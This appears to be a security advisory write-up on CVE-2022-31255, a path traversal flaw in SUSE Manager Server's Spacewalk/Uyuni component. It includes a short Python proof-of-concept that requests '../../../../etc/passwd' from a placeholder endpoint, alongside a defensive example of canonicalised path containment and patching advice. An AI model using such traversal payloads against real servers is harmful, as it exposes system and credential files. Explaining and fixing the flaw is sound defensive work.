A recent vulnerability, CVE-2022-31255, has been discovered in the Spacewalk/Uyuni component of the SUSE Linux Enterprise Module for SUSE Manager Server. It is an Improper Limitation of a Pathname to a Restricted Directory (Path Traversal). It can allow remote attackers to read files that are accessible to the user running the process, which is typically tomcat.

SUSE Manager Server 4.2

For the full list of affected packages and versions, refer to the content section above.

Exploit Details

The vulnerability lies in the improper limitation of a pathname to a restricted directory, which can potentially allow remote attackers to access and read files. This issue is typically caused by a lack of proper sanitization of user-supplied input (such as file paths), which can lead to unintended file access and exfiltration.

An example of a code snippet that can exploit this vulnerability might look like the following:

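import requests

# Placeholder endpoint and parameter name, for illustration only
target_url = "http://example.com/spacewalk_java_affected_endpoint"
# Relative path that climbs out of the intended directory
malicious_file_path = "../../../../etc/passwd"

response = requests.get(f"{target_url}?file_path={malicious_file_path}")
print(response.text)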

This code would send a request to the vulnerable endpoint on the target server, including a malicious file path in the request. If successful, this could enable the attacker to read the contents of the /etc/passwd file.
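
The server-side check whose absence makes the request above work, shown as an added example that is not part of the original advisory and is not SUSE's code. The function names, the "served" directory and the sample inputs are constructed for illustration; the example generalizes beyond the single payload above to absolute paths and symlinks.

```python
import os
import tempfile
from pathlib import Path


def resolve_naive(base_dir, user_path):
    """Vulnerable pattern: join the input onto the base and use the result."""
    return os.path.normpath(os.path.join(base_dir, user_path))


def resolve_contained(base_dir, user_path):
    """Canonicalize first, then require the result to stay under base_dir."""
    if "\x00" in user_path:
        raise ValueError("NUL byte in path")
    base = Path(base_dir).resolve()
    # resolve() collapses ".." and follows symlinks, so the containment test
    # is applied to the file that would really be opened.
    candidate = (base / user_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise PermissionError(f"path escapes {base}: {user_path!r}")
    return candidate


def demo():
    """Run constructed inputs through both resolvers and return the outcomes."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp, "served")         # constructed stand-in for the restricted directory
        base.mkdir()
        (base / "report.txt").write_text("ok")
        os.symlink("/etc", base / "link")  # symlink that points outside the base
        cases = ["report.txt", "../../../../etc/passwd", "/etc/passwd", "link/passwd"]
        for case in cases:
            naive = resolve_naive(str(base), case)
            try:
                resolve_contained(str(base), case)
                verdict = "allowed"
            except PermissionError:
                verdict = "rejected"
            results[case] = (naive, verdict)
    return results


if __name__ == "__main__":
    for case, (naive, verdict) in demo().items():
        print(f"{case!r:28} naive -> {naive}  contained -> {verdict}")
```

The check must run on the value after URL decoding, and the symlink case shows why comparing path strings without resolving them is not enough.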

This vulnerability has been documented in the following locations:

1. CVE-2022-31255
2. SUSE Security Announcement

Mitigation

To mitigate this vulnerability, users must update their SUSE Linux Enterprise Module for SUSE Manager Server systems and associated packages to the latest versions, or apply the necessary security patches. For more information on how to update your systems, refer to the SUSE documentation.

Conclusion

CVE-2022-31255 represents a significant security risk for users of SUSE Linux Enterprise Module for SUSE Manager Server and SUSE Manager Server. It is essential to ensure that your systems are up to date and that you have applied the necessary security patches to protect your data and infrastructure from potential exploitation.

Timeline

Published on: 11/10/2022 15:15:00 UTC
Last modified on: 11/16/2022 18:01:00 UTC